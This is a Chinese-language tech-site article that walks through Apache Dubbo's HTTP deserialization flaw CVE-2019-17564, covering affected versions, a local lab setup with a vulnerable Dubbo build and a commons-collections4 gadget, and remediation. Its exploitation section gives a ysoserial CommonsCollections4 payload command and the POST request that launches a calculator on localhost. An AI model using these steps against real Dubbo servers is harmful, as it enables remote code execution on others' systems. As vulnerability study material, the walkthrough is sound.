温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

如何分析Apache Dubbo反序列漏洞CVE-2019-17564

发布时间:2021-12-10 15:54:35 来源:亿速云 阅读:174 作者:柒染 栏目:大数据

如何分析Apache Dubbo反序列漏洞CVE-2019-17564,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。

0x01 简介    

Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。


0x02 漏洞概述      
   

Apache Dubbo HTTP协议中的一个反序列化漏洞(CVE-2019-17564),该漏洞的主要原因在于当Apache Dubbo启用HTTP协议之后,Apache Dubbo对消息体处理不当导致不安全反序列化,当项目包中存在可用的gadgets时即可导致远程代码执行。


0x03 影响版本      
   
2.7.0 <= Apache Dubbo <= 2.7.4.1    
2.6.0 <= Apache Dubbo <= 2.6.7    
Apache Dubbo = 2.5.x          


0x04 环境搭建

1、因为dubbo的启动需要依赖zookeeper,所以先安装zookeeper      
     
     
wget https://archive.apache.org/dist/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz# 将conf目录下的zoo_sample.cfg改名为zoo.cfgmv zoo_sample.cfg zoo.cfg# 进入bin目录启动zookeeper./zkServer.sh start
     


如何分析Apache Dubbo反序列漏洞CVE-2019-17564


2、从GIthub上获取dubbo的项目,并修改pom.xml      


git clone https://github.com/apache/dubbo-samples# 进入到dubbo-samples-http目录中,修改pom.xmlvim pom.xml
     


将dubbo版本修改为有漏洞的版本      


如何分析Apache Dubbo反序列漏洞CVE-2019-17564


添加依赖,导入一个可触发的gadgets,这边导入的是commons-collections4-4.0      


<dependency>        <groupId>org.apache.commons</groupId>        <artifactId>commons-collections4</artifactId>        <version>4.0</version>    </dependency>
     


如何分析Apache Dubbo反序列漏洞CVE-2019-17564


3、mvn构建,启动dubbo      

     
将下载的源码放入当前目录的src文件夹内      
     
mvn clean packagemvn -Djava.net.preferIPv4Stack=true -Dexec.mainClass=org.apache.dubbo.samples.http.HttpProvider exec:java
     


如何分析Apache Dubbo反序列漏洞CVE-2019-17564


0x05 漏洞利用

POST /org.apache.dubbo.samples.http.api.DemoService HTTP/1.1Host: 127.0.0.1:8080
paylaod
     


这边使用ysoserial生成paylaod

     
java -jar ysoserial-master-55f1e7c35c-1.jar CommonsCollections4 /System/Applications/Calculator.app/Contents/MacOS/Calculator > 1.ser
     


burp发包,弹出计算器


如何分析Apache Dubbo反序列漏洞CVE-2019-17564


0x06 修复方式

1.禁用HTTP协议      
2.及时升级到2.7.5及以上版本

看完上述内容,你们掌握如何分析Apache Dubbo反序列漏洞CVE-2019-17564的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注亿速云行业资讯频道,感谢各位的阅读!

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI